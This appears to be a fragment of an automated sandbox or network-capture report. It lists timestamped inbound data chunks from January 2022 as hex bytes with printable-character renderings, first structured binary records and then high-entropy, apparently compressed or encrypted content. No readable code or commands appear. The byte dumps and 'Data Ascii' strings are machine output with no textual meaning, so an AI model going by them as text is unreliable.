2022-01-28 21:14:32 UTC	49	IN	Data Raw: c6 00 03 00 00 00 00 07 3c 11 2f 16 9f 01 c6 00 03 00 00 00 00 07 3a 05 84 14 77 18 86 00 03 00 00 00 00 07 39 0c e4 16 b2 01 c6 00 03 00 00 00 00 07 35 10 87 16 a6 01 c6 00 03 00 00 00 00 07 33 10 80 16 9f 01 c6 00 03 00 00 00 00 07 31 05 84 14 77 18 86 00 03 00 00 00 00 07 2e 11 24 16 b2 01 c6 00 03 00 00 00 00 07 27 11 14 16 a6 01 c6 00 03 00 00 00 00 07 22 11 09 16 9f 01 c6 00 03 00 00 00 00 07 20 05 84 14 77 18 86 00 03 00 00 00 00 07 1f 10 79 16 b2 01 c6 00 03 00 00 00 00 07 1c 0c c2 16 a6 01 c6 00 03 00 00 00 00 07 1b 11 04 16 9f 01 c6 00 03 00 00 00 00 07 19 05 84 14 77 18 86 00 03 00 00 00 00 07 18 10 79 16 b2 01 c6 00 03 00 00 00 00 07 14 10 f9 16 a6 01 c6 00 03 00 00 00 00 07 12 10 f3 16 9f 01 c6 00 03 00 00 00 00 07 10 05 84 14 77 18 86 00 03 Data Ascii: </:w9531w.$'" wywyw
2022-01-28 21:14:32 UTC	50	IN	Data Raw: 14 77 18 86 00 00 00 01 f5 9c 06 99 0a 3b 10 89 00 93 00 00 00 01 f5 60 06 97 09 4f 17 8d 00 c6 00 00 00 01 f4 a8 06 94 08 ac 17 9c 00 c6 00 00 00 01 f3 54 06 93 0e 8d 10 89 00 81 00 00 00 01 f3 1c 06 92 00 56 10 89 00 81 00 00 00 01 f0 e4 06 8f 08 ac 10 89 00 81 00 00 00 01 f0 7c 06 8e 01 5e 17 80 08 c6 00 00 00 01 f0 4c 06 8e 01 5a 17 73 08 c6 00 00 00 01 f0 08 06 8e 00 20 17 a1 00 c6 00 00 00 01 f0 04 06 8b 08 a4 17 a7 00 c6 00 00 00 01 ef fc 06 8a 01 5e 17 92 00 c6 00 00 00 01 ef f4 06 8a 01 5a 17 68 08 c6 00 00 00 01 ef d0 06 8a 01 6b 17 5b 08 c6 00 00 00 01 ef cc 06 8a 01 6b 17 4f 08 c6 00 00 00 01 ef c8 06 8a 01 6b 17 43 08 c6 00 00 00 01 ef c4 06 89 01 6f 14 aa 00 c4 00 00 00 01 ef 7c 06 89 00 20 10 89 00 81 00 00 00 01 ee ec 06 85 0f bc 14 77 18 Data Ascii: w;`OTV\|^LZs ^Zhk[kOkCo\| w
2022-01-28 21:14:32 UTC	51	IN	Data Raw: 40 0e f7 10 f0 00 91 00 00 00 01 db f4 06 40 0e f7 10 89 00 96 00 00 00 01 db d0 06 3e 0e ef 10 89 00 93 00 00 00 01 db 74 06 3c 0e e7 10 89 00 84 00 00 00 01 da 30 06 39 0e df 10 89 00 94 00 00 00 01 d9 e4 06 37 0e d8 10 89 00 94 00 00 00 01 d9 a0 06 34 0e d0 10 89 00 94 00 00 00 01 d9 2c 06 33 0d 9c 10 89 00 94 00 00 00 01 d8 fc 06 32 0a 84 10 f0 00 96 00 00 00 01 d8 dc 06 31 0a 84 10 89 00 94 00 00 00 01 d8 bc 06 2f 0e c8 14 77 18 86 00 00 00 01 d8 30 06 2d 0b fb 14 77 18 86 00 00 00 01 d7 fc 06 2d 00 1c 10 89 00 93 00 00 00 01 d7 d8 06 2a 0e b6 10 89 00 96 00 00 00 01 d7 34 06 2a 00 1c 14 4f 18 91 00 00 00 01 d6 fc 06 2a 00 1c 10 89 00 93 00 00 00 01 d6 d8 06 29 00 93 14 c1 00 c6 00 00 00 01 d4 c8 06 29 00 8d 14 c1 00 c6 00 00 00 01 d4 8c 06 28 00 88 Data Ascii: @@>t<0974,321/w0-w-4O*))(
2022-01-28 21:14:32 UTC	53	IN	Data Raw: b9 40 05 ec 0d fe 10 89 00 86 00 00 00 01 b8 dc 05 ec 01 81 10 89 00 86 00 00 00 01 b7 d4 05 eb 0d f6 10 89 00 93 00 00 00 01 b7 44 05 e7 0d ec 10 89 00 91 00 00 00 01 b7 0c 05 e7 0b cc 10 89 00 86 00 00 00 01 b6 e4 05 e7 09 30 10 89 00 86 00 00 00 01 b6 bc 05 e7 00 24 10 89 00 86 00 00 00 01 b6 88 05 e7 01 6b 10 89 00 86 00 00 00 01 b6 60 05 e7 00 3b 10 f0 00 86 00 00 00 01 b6 3c 05 e7 00 3b 10 89 00 86 00 00 00 01 b5 ec 05 e7 00 20 19 3a 01 e1 00 00 00 01 b5 cc 05 e6 01 6f 10 89 00 81 00 00 00 01 b5 60 05 e6 00 20 10 89 00 86 00 00 00 01 b5 40 05 e6 0d e6 10 89 00 86 00 00 00 01 b5 20 05 e4 0d dc 14 77 18 81 00 00 00 01 b4 64 05 e3 0d d5 14 77 18 86 00 00 00 01 b4 38 05 e3 0a 13 19 25 05 c6 00 00 00 00 00 00 05 e2 01 6f 10 89 00 86 00 00 00 01 b4 18 05 Data Ascii: @D0$k`;<; :o` @ wdw8%o
2022-01-28 21:14:32 UTC	54	IN	Data Raw: 80 00 00 00 00 05 a3 01 09 10 89 00 91 00 08 00 01 9b 1c 05 a2 0c ee 10 f0 00 91 00 08 00 01 99 bc 05 a0 0c f5 10 89 00 91 00 00 00 01 99 98 05 9f 0c ee 10 89 00 93 00 00 00 01 99 78 05 9f 00 1c 10 89 00 93 00 00 00 01 99 60 05 9f 02 ea 10 f0 00 91 00 08 00 01 98 e4 05 9f 02 ea 10 89 00 91 00 08 00 01 98 d8 05 9f 00 8d 14 c1 00 c6 00 00 00 01 98 9c 05 9e 00 93 14 c1 00 c6 00 00 00 01 98 4c 05 9d 03 28 10 89 00 86 00 00 00 01 98 2c 05 9d 00 8d 10 89 00 86 00 00 00 01 98 0c 05 9d 00 20 14 77 18 86 00 00 00 01 97 ec 05 9c 0c e4 16 b2 01 c6 00 03 00 00 00 00 05 98 0c d9 16 a6 01 c6 00 03 00 00 00 00 05 96 0c d3 16 9f 01 c6 00 03 00 00 00 00 05 94 05 84 14 77 18 86 00 03 00 00 00 00 05 93 0c cc 16 b2 01 c6 00 03 00 00 00 00 05 90 0c c2 16 a6 01 c6 00 03 00 00 Data Ascii: x`L(, ww
2022-01-28 21:14:32 UTC	58	IN	Data Raw: 00 01 3f a4 04 72 00 20 16 d7 01 e6 00 00 00 01 3f 80 04 72 00 3b 16 d7 09 e6 00 00 00 01 3f 5c 04 72 00 20 14 77 18 86 00 00 00 01 3f 34 04 72 09 86 10 89 00 93 00 00 00 01 3e f4 04 71 09 7f 10 89 00 93 00 00 00 01 3e d8 04 71 09 79 10 89 00 93 00 00 00 01 3e bc 04 71 09 73 10 89 00 93 00 00 00 01 3e 60 04 71 00 20 14 77 18 83 00 00 00 01 3e 40 04 71 00 1c 14 4f 18 91 00 00 00 01 3e 20 04 71 00 1c 10 89 00 93 00 00 00 01 3d fc 04 6e 08 a4 17 a7 00 c6 00 00 00 01 3d f4 04 6e 00 20 17 a1 00 c6 00 00 00 01 3d f0 04 6d 09 5c 10 89 00 91 00 00 00 01 3d 84 04 6d 00 20 11 14 00 81 00 00 00 01 3c f0 04 6c 09 57 10 89 00 81 00 00 00 01 3c 4c 04 6c 00 20 10 fc 00 81 00 00 00 01 3c 00 04 6c 00 20 10 f0 00 81 00 00 00 01 3b 88 04 69 08 ac 17 9c 00 c6 00 00 00 01 3a Data Ascii: ?r ?r;?\r w?4r>q>qy>qs>`q w>@qO> q=n=n =m\=m <lW<Ll <l ;i:
2022-01-28 21:14:32 UTC	62	IN	Data Raw: 00 ce 00 02 85 02 31 14 0d 00 91 00 00 00 00 cd e0 02 83 02 31 12 b9 00 91 00 00 00 00 cd b8 02 81 02 31 10 fc 00 91 00 00 00 00 cd 98 02 7f 02 31 14 22 00 91 00 00 00 00 cd 70 02 7d 02 31 13 b2 00 91 00 00 00 00 cd 1c 02 7d 00 3b 10 89 00 81 00 00 00 00 cd 14 02 7b 02 31 12 be 00 91 00 00 00 00 cc 34 02 79 02 31 11 ca 00 91 00 00 00 00 cc 14 02 77 02 31 11 9b 00 91 00 00 00 00 cb ec 02 75 02 31 13 21 00 91 00 00 00 00 cb bc 02 73 02 31 12 ed 00 91 00 00 00 00 cb 9c 02 71 02 31 16 57 00 91 00 00 00 00 cb 74 02 6f 02 43 10 89 00 91 00 00 00 00 c9 40 02 6e 04 b5 10 89 00 81 00 00 00 00 c9 18 02 6c 02 31 12 44 00 91 00 00 00 00 c8 f8 02 6a 02 31 13 ee 00 91 00 00 00 00 c8 d8 02 69 04 ab 10 89 00 81 00 00 00 00 c8 8c 02 67 02 31 16 4f 00 91 00 00 00 00 c8 6c Data Ascii: 1111"p}1};{14y1w1u1!s1q1WtoC@nl1Dj1ig1Ol
2022-01-28 21:14:32 UTC	63	IN	Data Raw: a3 80 02 03 02 27 10 f0 00 91 00 00 00 00 a3 40 02 01 02 31 16 1f 00 91 00 00 00 00 a3 20 01 ff 02 31 12 3f 00 91 00 00 00 00 a3 04 01 fc 03 65 10 fc 00 91 00 00 00 00 a0 98 01 fa 02 31 12 db 00 91 00 00 00 00 a0 94 01 f8 03 59 10 89 00 81 00 00 00 00 9e 04 01 f6 02 31 12 28 00 91 00 00 00 00 9d a0 01 f4 02 31 13 55 00 91 00 00 00 00 9d 7c 01 f2 02 31 13 1c 00 91 00 00 00 00 9d 50 01 f1 04 0a 10 89 00 91 00 00 00 00 9c dc 01 ee 04 00 10 89 00 86 00 00 00 00 9c a8 01 ec 02 31 11 08 00 91 00 00 00 00 9c 64 01 ea 02 31 11 a3 00 91 00 00 00 00 9c 34 01 e8 03 f8 10 89 00 81 00 00 00 00 9b 9c 01 e6 02 31 13 8e 00 91 00 00 00 00 9b 40 01 e4 02 31 16 17 00 91 00 00 00 00 9b 18 01 e3 02 b2 10 89 00 91 00 00 00 00 9a c0 01 e1 02 31 13 4d 00 91 00 00 00 00 9a a0 01 Data Ascii: '@1 1?e1Y1(1U\|1P1d141@11M
2022-01-28 21:14:32 UTC	68	IN	Data Raw: 80 00 08 00 3f 10 89 00 81 00 00 00 00 21 f4 00 02 00 3f 14 8c 01 e6 00 00 00 00 21 bc 00 02 00 3b 14 9b 09 e6 00 00 00 00 21 9c 00 02 00 3b 14 8c 09 e6 00 00 00 00 21 7c 00 02 00 3b 10 f0 00 81 00 00 00 00 21 54 00 02 00 3b 10 89 00 81 00 00 00 00 21 30 00 01 00 34 14 77 18 86 00 00 00 00 20 bc 00 01 00 24 14 7d 05 c6 00 00 00 00 00 00 00 01 00 20 14 77 18 84 00 00 00 00 20 9c 00 01 00 1c 14 56 00 91 00 00 00 00 20 80 00 01 00 1c 14 4f 18 91 00 00 00 00 20 50 0e 99 10 f0 00 11 13 d9 10 89 00 11 13 cf 10 89 00 36 0f 0b 11 20 00 36 01 b4 11 08 00 36 01 b4 11 14 00 36 01 b4 10 fc 00 36 01 b4 10 f0 00 36 01 b4 10 89 00 36 13 99 10 f0 01 33 13 99 10 89 01 33 01 b4 10 89 00 01 13 1d 10 fe 00 33 13 18 10 f2 00 33 13 13 10 8b 00 33 13 0e 11 2c 00 33 13 09 11 20 Data Ascii: ?!?!;!;!\|;!T;!04w $} w V O P6 66666633333,3
2022-01-28 21:14:32 UTC	72	IN	Data Raw: 00 a1 11 2c 00 01 00 b9 11 20 00 01 00 b4 11 08 00 01 00 5b 11 14 00 01 00 aa 10 fc 00 01 00 a4 10 f0 00 01 00 a1 10 89 00 21 00 75 10 89 00 01 00 31 11 08 00 21 00 2d 11 14 00 21 00 2d 10 fc 00 21 00 61 10 f0 00 01 00 5b 10 89 00 11 00 31 10 89 00 26 00 31 11 14 00 21 00 31 10 fc 00 21 00 2d 10 f0 00 01 00 28 10 89 00 01 06 40 02 ba 01 b5 00 00 14 3a 00 10 01 80 06 3b 02 b8 01 b5 00 01 14 31 00 10 01 81 06 39 02 b8 01 b5 00 00 14 2c 00 10 01 00 06 38 02 b7 01 b5 00 00 10 89 00 10 01 83 06 30 02 b1 01 b5 00 00 14 27 00 10 01 80 06 30 02 b1 03 69 00 00 10 89 00 00 01 13 06 30 02 af 01 b5 00 00 14 22 00 00 01 00 06 30 02 af 01 b5 00 00 14 1a 00 10 01 80 06 2a 02 ae 01 b4 00 00 14 15 00 10 00 80 06 26 02 ae 01 91 00 00 11 2c 00 00 01 05 06 22 02 ae 01 91 00 Data Ascii: , [!u1!-!-!a[1&1!1!-(@:;19,80'0i0"0*&,"
2022-01-28 21:14:32 UTC	76	IN	Data Raw: b2 09 b9 00 06 08 b2 09 b2 00 06 08 b2 09 97 00 06 08 b2 09 80 00 06 08 b2 09 67 00 06 08 b2 09 5a 00 06 08 b2 09 3d 00 06 08 b2 09 20 00 06 08 b2 09 05 00 06 08 b2 08 e6 00 06 08 b2 08 cd 00 06 08 b2 08 c4 00 06 08 b2 08 9a 00 06 00 39 08 93 00 06 00 39 08 75 00 06 00 39 08 6a 00 06 00 39 08 56 00 06 00 39 08 44 00 06 00 39 08 34 00 06 00 39 08 2d 00 06 00 39 08 22 00 06 00 39 08 19 00 06 00 39 08 02 00 06 00 39 07 ec 00 06 00 39 07 d4 00 06 07 ab 07 ca 00 0e 07 ab 07 b6 00 0e 07 ab 07 96 00 0e 00 39 07 84 00 06 00 39 07 77 00 06 00 39 07 61 00 06 00 39 07 5c 00 06 00 4d 07 43 00 16 00 00 07 28 01 7b 00 4d 07 0d 00 16 00 4d 06 f8 00 16 06 ec 06 e1 00 1a 00 39 06 c7 00 06 00 39 06 b2 00 06 00 39 06 ab 00 06 00 39 06 a5 00 06 00 39 06 9f 00 06 00 39 06 99 Data Ascii: gZ= 99u9j9V9D949-9"999999w9a9\MC({MM999999
2022-01-28 21:14:32 UTC	80	IN	Data Raw: ca 46 30 28 ff 71 35 6b fb 67 dd 70 f9 44 62 f2 02 94 91 5b 11 24 aa 3d 4e 40 d8 fc 80 2e b7 49 8e 4b dc 1f 92 03 00 5a 96 65 6d e9 1e 6d 0a e2 57 3d 13 5e a5 49 02 18 4b 8b 10 a7 63 6d 93 93 fb e6 16 bb 27 7e 61 cd 67 ec 78 69 11 73 e1 27 74 e0 8b ca 1c 57 f7 fd b9 27 d2 f6 cc 30 53 c1 d9 53 0e ca 76 96 1f a3 54 4f d2 30 a4 58 af 89 7b a2 d9 8a 5d ea 5f 1c ac 02 48 9f 70 ac 90 0d ae 66 39 f3 bc 4a dc 6b 61 5a 63 dc a8 5a c4 d3 ff 6f f2 f9 d3 51 de ee 50 5b 9c 5a 2f 3d 01 03 cd b0 2c 9d 1f 91 14 89 ef e3 a6 eb b0 8f 37 97 ce c9 94 3b 59 16 a1 31 26 05 19 37 23 7b 7e 44 a9 f5 5c 3a 5b d5 6a 08 ff 57 0c 08 6a 1c b7 55 7b db 42 36 7d 77 39 3a 81 41 8c 49 53 e0 09 f5 c8 af 42 83 4d 40 5d 25 2f f8 0a 3d 4d 47 38 4d fd ae 6a 72 0f 32 5b f2 ba 11 27 43 89 f4 cd Data Ascii: F0(q5kgpDb[$=N@.IKZemmW=^IKcm'~agxis'tW'0SSvTO0X{]_Hpf9JkaZcZoQP[Z/=,7;Y1&7#{~D\:[jWjU{B6}w9:AISBM@]%/=MG8Mjr2['C
2022-01-28 21:14:32 UTC	84	IN	Data Raw: ca 60 4b bb 45 7e 11 97 9b 82 ed dd ef b2 7f 61 d0 9a 43 e2 69 50 7f a3 f7 33 4c 79 05 dd 69 43 e3 dc a8 ee 48 7e e4 d4 1b 1d 1c b8 af 83 35 0b 47 11 03 35 60 05 7f ad a0 fe 66 f1 86 30 4a c6 6d c8 87 89 b0 e3 40 7f 9d 9b 3e 13 c2 12 0d e7 df 43 50 a4 45 40 5c 24 3a a8 a2 da 7e 6e 20 ce b1 74 72 a0 16 9e 68 41 ac 15 9d 68 89 99 55 5e fc 25 db 4d c6 f5 74 fd 9f 50 aa e4 c1 6b 62 b9 16 8c a7 a1 01 73 44 79 82 3a c3 fd cc 55 30 f8 5f 26 c7 c9 51 f5 9f 84 45 d9 2a 4f 57 77 c9 fc 36 aa 37 ad 81 ce 34 ce 62 05 7d 39 5b 5c 92 fa 74 fd f5 c2 2c 67 f1 ee 70 00 a7 cf 10 c0 97 3d 04 6e ab 61 fc 1e 87 e8 92 46 fb 31 27 75 09 e2 b1 7f 92 31 d9 31 e5 de ce 2c 8e b0 77 18 e3 8d ea ac 05 4b 4d 6c a8 3c 34 d2 12 3f f0 de 01 3e b2 91 cf 14 af fb 2d 36 cf e0 c5 38 33 b5 e7 Data Ascii: `KE~aCiP3LyiCH~5G5`f0Jm@>CPE@\$:~n trhAhU^%MtPkbsDy:U0_&QE*OWw674b}9[\t,gp=naF1'u11,wKMl<4?>-683
2022-01-28 21:14:32 UTC	88	IN	Data Raw: 9c 03 61 39 f2 60 84 f5 90 01 5a 47 61 75 8c 30 0b 61 e3 25 86 ab 41 65 e6 1b cc 8c 35 1f 54 e8 48 68 60 19 2d f2 7c 07 a9 f9 a8 0a 94 1b 02 39 98 75 d3 a1 ef 15 f7 94 65 3f fe bc 77 1c 6c 6f 4d 27 f6 6e ba 5a a0 17 1b fe 1b 6e f0 aa db 47 8e c0 84 a8 38 18 87 db a7 54 07 bf e7 e2 d3 60 e9 9c 06 01 3a a1 64 9f 0d a1 55 cc 20 91 32 75 0c bf e4 31 50 d1 72 f9 2e 6d 45 f3 c1 3c 75 d2 f0 d0 4f a6 41 66 95 37 54 99 18 e7 5b 61 fe 2c 76 dc b4 17 56 5d e9 d6 dd b3 a4 22 b8 d9 a4 d8 08 bf 8e f3 e1 11 8a 78 36 da 10 dc b0 4a 3f 09 96 cb 49 44 94 8b 95 9a 79 78 8e 35 4d 3f 73 0c 4c 8d 9f 36 52 a3 5f b7 31 66 8b a5 c7 3f 4d ba d4 7f df 1d fd c3 75 88 32 23 fb c3 ac e7 28 53 38 eb 1c c1 4d a1 e9 3c ed d0 dd a3 3b 46 e4 cb 7a 96 1e 43 e7 f8 c0 49 cf fe f2 bb 98 f4 62 Data Ascii: a9`ZGau0a%Ae5THh`-\|9ue?wloM'nZnG8T`:dU 2u1Pr.mE<uOAf7T[a,vV]"x6J?IDyx5M?sL6R_1f?Mu2#(S8M<;FzCIb
2022-01-28 21:14:32 UTC	92	IN	Data Raw: 0f 5e 09 9d 58 d5 99 ee 68 0c 1c fa f3 40 9e fd cb 46 86 f1 5a 13 26 26 70 0e 8d ef 0e ef ea 09 3b 4c 22 83 42 01 b1 48 38 9c 63 c3 80 38 08 cc 37 6c 45 bf 61 e4 d2 21 d1 f7 7b f4 0a c5 29 0c e3 08 c0 38 53 55 c4 69 3e 23 f9 4a 2b 36 71 85 6d 00 3b ca 7e c9 4f 95 e5 d4 4f 54 66 00 d0 1b 21 6e 18 35 c8 24 26 b4 18 e1 02 76 65 dc 9e 89 53 3e f2 48 55 94 83 f0 ff de d1 a7 c3 fe f2 88 c6 24 f9 b1 4b bc 1c 70 b4 5f c5 31 68 a7 f6 14 23 da 4c 6a 35 ef 3b 32 21 98 58 63 2a 4e 8c f9 98 b5 ae 63 58 f5 d0 f8 cc b2 6c a8 b7 56 8c f7 56 69 08 96 b7 6a 74 7e fb 59 8b 1d b1 0c d5 ba 4f 0d 18 91 d5 d2 39 23 97 3e f2 ef 66 93 0b ef 64 3f 41 e8 63 20 25 95 cb 52 48 51 78 5e 41 52 8c b5 43 2e af 32 27 b1 f3 d8 0f 69 b0 72 ea 44 99 90 e3 c3 30 ab d1 13 ab c1 30 91 9f d3 46 Data Ascii: ^Xh@FZ&&p;L"BH8c87lEa!{)8SUi>#J+6qm;~OOTf!n5$&veS>HU$Kp_1h#Lj5;2!Xc*NcXlVVijt~YO9#>fd?Ac %RHQx^ARC.2'irD00F
2022-01-28 21:14:32 UTC	95	IN	Data Raw: 91 e3 78 e4 c6 2e f0 2b 74 a6 8a c3 23 0f 87 69 42 dc 16 a2 12 54 64 b3 80 5e 59 08 7b c8 95 cc df 38 9c 03 cc a6 bf b2 7d 34 e1 b2 eb a8 8a 2c a6 89 f2 3e c8 08 39 8e a7 a6 ee d7 85 31 16 71 8d f7 8c 16 1e ad 6e e8 35 da 31 21 6f ed 3e 7b a1 19 49 ab 91 0d f5 06 48 5c 6d f8 18 37 8a 52 08 ae 5d 37 1c b6 89 d4 c4 7b e4 ef 0d 5c 23 d7 6b d7 18 a7 8a c1 cd f3 0a 9d 80 ad 0d d3 c0 57 27 07 7a 0f 7c 77 09 a8 23 f8 87 ac c8 b6 6f 30 e4 eb d0 d6 fb d6 80 cb b7 d4 3c d1 a6 73 02 06 f2 f1 22 2b 21 95 cc 87 81 12 e3 ec d5 24 30 d2 05 7e 15 91 38 8d 03 8c 53 1e f7 9b da d9 41 bb ff 15 a0 8c 9a 84 76 b4 1d 9c 21 bf 29 69 7b 48 32 b1 f7 50 50 02 6e 73 95 25 aa b2 a7 63 97 71 52 6a 46 95 8f 7e 73 8b ba 62 07 6d 8d ff 0b f9 f3 0a ee 9d 93 13 44 b0 b2 29 23 09 40 c2 cb Data Ascii: x.+t#iBTd^Y{8}4,>91qn51!o>{IH\m7R]7{\#kW'z\|w#o0<s"+!$0~8SAv!)i{H2PPns%cqRjF~sbmD)#@
2022-01-28 21:14:32 UTC	100	IN	Data Raw: 1a 54 05 10 bd 3f 00 b1 2f ea 45 58 8b 35 c2 e3 88 9f f6 9a b5 97 08 b1 53 e2 ee b4 08 53 40 4d c6 77 99 30 0d b2 27 43 f0 47 2e 30 b4 95 cc e9 fa d3 39 02 72 43 50 9e 7f 51 48 b1 ba cb 87 fd d5 b7 7c bb 6a a3 eb a4 69 8b 16 ad 9e a1 cb 76 ae 65 80 35 99 17 fa 01 6d a9 27 21 f2 04 fd 7f 93 19 c8 38 ff d7 19 7f 72 27 14 5f 04 eb 30 7e 63 72 ee 21 30 a6 6d a2 30 7b b2 f4 ea 77 0d 32 8a 3a b5 44 42 42 9e 40 89 16 c0 bf f3 3e 7b 87 87 e5 ac 74 2f b1 4c 6e 67 34 4d 2e 58 17 02 a5 f3 c9 1b be ba af 34 da 7b 0b 32 92 25 6f 66 d8 87 d8 f6 8c b4 ea f6 85 a3 75 78 7e b7 2b 1a 63 2d b5 ac 99 7d 1e 60 80 be 3f b9 ea 77 47 8e ef 5e 0d 36 74 90 71 90 57 5c 83 79 89 24 e7 8f 1c 7e 3a 31 a4 8e 7b 3d 12 0a a6 b6 21 fd aa c7 fe 27 d0 a8 4a c6 1e 11 a2 7c c5 b6 fa d8 48 47 Data Ascii: T?/EX5SS@Mw0'CG.09rCPQH\|jive5m'!8r'_0~cr!0m0{w2:DBB@>{t/Lng4M.X4{2%ofux~+c-}`?wG^6tqW\y$~:1{=!'J\|HG
2022-01-28 21:14:32 UTC	104	IN	Data Raw: c1 d1 b0 2b 0f 3c 65 93 46 d1 6e 76 78 cc 91 b8 2d be bf 88 fd 2b 2d e8 b6 e6 cb df ce e1 ac 01 26 63 2d e9 01 3c be b6 7f 2e c3 51 7a 79 bc b3 d9 5b 84 4c 1b 36 ce 11 5a d0 b9 86 04 29 ba 4b 27 dd fc 2c 02 03 c1 95 94 18 44 db 74 ad 71 5b f7 20 72 a1 0d 8b 26 01 72 a1 e9 43 de 58 ab b9 45 d2 07 a1 34 7a d0 79 24 c3 a7 97 f3 7f 9c 5e 09 e1 7f 2f e7 2b b2 5b 1a bb 43 43 95 6d e4 b8 ed a5 b7 37 05 09 8b 1c 5b 95 70 11 95 34 2b 06 b8 c1 5f 38 49 f9 a9 77 06 42 01 51 f8 66 d3 f2 22 b1 fd 08 bf 36 08 f1 f5 3f 31 c4 39 c9 b7 af eb 7f 9a 28 5e 86 34 48 59 bd 0a 7c 50 06 7c fd 9b 98 80 c7 53 33 f6 af 89 61 bd 2e ad dd 3c 16 02 78 d2 a3 17 c6 ee cc 1c 2e da 92 34 76 d7 ab d8 44 40 c6 34 d6 66 57 0f 20 33 e0 fe e7 3b 95 a1 05 f3 9d 42 a3 7d 16 61 02 f9 6c 10 f1 69 Data Ascii: +<eFnvx-+-&c-<.Qzy[L6Z)K',Dtq[ r&rCXE4zy$^/+[CCm7[p4+_8IwBQf"6?19(^4HY\|P\|S3a.<x.4vD@4fW 3;B}ali
2022-01-28 21:14:32 UTC	108	IN	Data Raw: 0e 36 e4 2f da 8a cb 43 b0 a1 bf 6f 91 c1 1e dc 6b b2 70 f0 4b 35 62 92 fd f7 b3 46 0e 00 8b bb 82 39 24 ec 71 b9 24 70 16 24 25 af 74 bf 19 83 77 ef c1 3f b5 70 38 87 96 db 89 4c 36 81 75 4d 27 f8 b8 87 c9 13 ef 74 fa 21 d0 08 21 4d fd 25 0d f5 77 de 42 2b 4f f3 ce 58 4b c5 c9 c1 50 6d 40 64 b9 5f c0 09 b3 81 62 b1 bc 88 4e dd fe 33 d1 42 91 38 0a e4 8c 0a 66 fa 4b f0 48 b1 e6 ef e9 bf 8a 2c 8d bc 96 f1 04 90 44 de 05 71 be 87 4b 7d 16 97 62 d1 88 df 80 c1 5f 69 f3 be 08 2b 8c cf 68 6d cd 3d 45 51 de 92 7c 9d 13 11 4c ff 6b 01 fb ae b6 07 c0 e2 21 6b a5 9a c6 00 32 98 b6 c2 f1 09 65 0b d4 b0 c8 17 d9 1d ae 4b 04 17 3e 7f 20 98 d4 e7 8c 35 24 c1 4c 62 de f7 56 ad 05 77 d3 3b ff e5 bf 9b b0 ee f7 0f ba 1c 94 bb d7 50 ad 33 4a f8 db 2e c4 87 cd 79 61 51 7f Data Ascii: 6/CokpK5bF9$q$p$%tw?p8L6uM't!!M%wB+OXKPm@d_bN3B8fKH,DqK}b_i+hm=EQ\|Lk!k2eK> 5$LbVw;P3J.yaQ
2022-01-28 21:14:32 UTC	112	IN	Data Raw: 5b 37 23 74 5d 80 e1 99 58 7a dc 9c 26 f6 d3 26 1e e4 1c ae 8f 5d 2f 17 6c 70 e7 d6 1e 3a 76 74 84 e6 13 b3 2d 20 d8 c1 2c 76 33 d8 3d 53 51 d7 f5 7f a5 84 5c 47 2e db 0b 42 9f 9c 91 ab 62 68 b3 22 20 38 60 78 63 9a b9 66 b4 90 c4 1f 23 4c 79 b9 8a 46 42 12 d4 ee a4 5b 32 bf 6c 17 b3 d2 01 a9 39 97 3f 03 15 5c db f1 f8 57 ac 62 43 5d 64 e0 4a 1c 80 c8 45 0c 76 59 e2 0a d8 e6 26 4a 84 ed d9 7e 7d 34 a7 6e 66 36 d0 f6 dc 2e 1c 70 bf a9 7f ae 02 a2 53 26 f6 1f 47 d8 88 0c 36 17 cf ba 8f 95 ff 20 9f 42 7e 4f dc e7 33 ec 59 bd fe 1f 4d e5 b8 ca 8c df 9a d0 e3 12 69 ff 0c 3f 4f 98 ca 45 dd b9 45 a7 0f ea 33 5e 9f c4 08 4f e0 86 a0 82 05 e2 83 b4 ed 03 6b 9d 93 f4 d9 98 a9 4e 55 0a af b5 ed d1 eb 18 76 c2 f5 6b ee 70 52 fa 0e 4e 35 01 21 5e 99 87 5a 16 fe e0 6a Data Ascii: [7#t]Xz&&]/lp:vt- ,v3=SQ\G.Bbh" 8`xcf#LyFB[2l9?\WbC]dJEvY&J~}4nf6.pS&G6 B~O3YMi?OEE3^OkNUvkpRN5!^Zj
2022-01-28 21:14:32 UTC	116	IN	Data Raw: 5d ea 15 8e 51 b7 42 5e 3e 53 1d 6e 55 f3 41 f0 44 ca fb fd 31 80 a0 43 dd 0f 7a 8b 36 7d f2 95 e2 41 06 7d 04 56 a6 60 1a 79 71 1b 24 31 ff 6b cf 30 26 ab 0b c7 42 23 11 86 2a 1a d8 ff 87 7c b2 e8 8e 89 4a 1c 7f 68 10 8e c7 cf 98 ac 30 97 e9 51 b9 2d 72 eb 7a 0f da 9b 75 cc d8 04 86 a6 de 9e e5 e8 7b 4b 9e 65 3f 35 bf cb f9 20 31 c5 58 37 2f 65 d0 fd 2d 44 5e e5 06 6c 4e 9c 25 34 41 de 7e 69 22 60 39 95 38 09 20 48 87 34 98 72 00 57 64 c9 b3 60 01 fd cf 86 d4 06 9a e7 50 b0 0d af 6b f4 e3 b3 57 8c 21 c2 37 54 06 fe 76 83 fa 34 22 0b 45 68 a9 2c 66 84 3a 6d 80 4d 57 b9 c3 0b a1 91 e8 42 fb 67 ee bf 82 a5 bd 35 b4 d8 b1 e2 41 f9 8c c0 05 cf 30 59 7d a1 91 45 50 ae d9 16 42 ca 2c 2e 4b 2c 06 59 b6 95 eb a5 3e 70 a4 00 3c 78 bd 1c e6 f2 73 b3 fc 95 a3 1d 56 Data Ascii: ]QB^>SnUAD1Cz6}A}V`yq$1k0&B#*\|Jh0Q-rzu{Ke?5 1X7/e-D^lN%4A~i"`98 H4rWd`PkW!7Tv4"Eh,f:mMWBg5A0Y}EPB,.K,Y>p<xsV
2022-01-28 21:14:32 UTC	120	IN	Data Raw: bc eb 6a 58 e1 5c 25 36 51 bc 95 40 92 85 b9 c8 62 95 7b 6d 7f 7d 76 94 31 10 08 c2 7c 68 0e a7 db 76 cc ef 22 f3 c5 71 8a ab 8d 65 15 29 39 ee db 93 2f e5 da 2f ff 47 e3 4c cf 66 9d 50 c6 4c db 06 cb 30 ae 93 fc 47 05 65 06 30 3b 57 ed b5 18 41 52 32 37 16 cc c8 f3 82 38 d9 13 09 6b f7 20 6a 42 4b af 99 c3 c0 48 69 90 9f af ce 55 1e 82 ef a9 53 2a 7c d6 d1 b0 16 4e 7b 0e 7c 90 7a 0e 77 ec c1 e3 df 25 68 2f 04 39 b3 32 a8 ed 3c b7 60 15 c8 b5 89 e6 64 33 64 d6 14 3a 0a 92 28 d7 23 e4 34 59 87 37 48 06 d1 ca 0c 72 47 5d f7 3b d9 41 02 de f9 89 54 d9 70 d9 80 7e ef c7 a2 ae f7 29 97 79 e5 46 ab c8 28 2a c4 51 1d 6f 3c de 23 94 2c 